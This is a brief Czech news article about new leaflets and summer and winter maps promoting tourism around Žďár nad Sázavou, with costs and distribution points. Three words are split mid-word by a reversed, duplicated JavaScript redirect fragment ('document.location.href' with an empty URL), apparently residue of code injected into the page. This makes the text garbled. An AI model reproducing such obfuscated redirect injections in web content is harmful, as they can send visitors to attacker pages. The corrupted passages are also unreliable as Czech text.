Rainbow page separator

Žďársko propagují nové informační materiály

Sobota, 25. dubna 2015

Hamroň

Žďár nad Sázavou / Sady propagačních materiálů v několika jazykových mutacích Poznej aktivně Žďársko jsou v současné době k dispozici turistům. Jedná se o sadu osmi tematických skládaček a dvou map. Čtyři skládačky jsou zaměřeny na Pilskou nádrž a tamní nový volnočasový areál a další čtyři materiály propagují aktivity v okolí města. Jsou rozděleny na poznávání Žďárska s dětmi, plastiky výtvarníka Michala Olšiaka, objevování Žďáru a pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování za okolními přírodními zajímavostmi.

Mapy jsou k dispozici v letní i zimní variantě. První je zaměřena na letní sezonu s vyznačenými turistickými trasami a cyklotrasami, druhá mapa obsahuje přehled lyžařských tratí v okolí města. Sady byly vyrobeny v nákladu dvacet tisíc kusů za 702 tisíc korun, přičemž projekt podpořily evropské peníze ve výši 597 tisíc.

Propagační materiály jsou k dispozici ve vstupním pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru městského úřadu, v zařízeních spravovaných příspěvkovou organizací města Sportis, ve žďárském infocentru i v informačních centrech v okolí. Budou předány rovněž příspěvkové organizaci Kraje Vysočina Vysočina Tourism k prezentaci na zahraničních veletrzích ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovního ruchu, informačnímu centru Czech Tourism v Praze a českým centrům v Berlíně, Bratislavě, Varšavě a Vídni.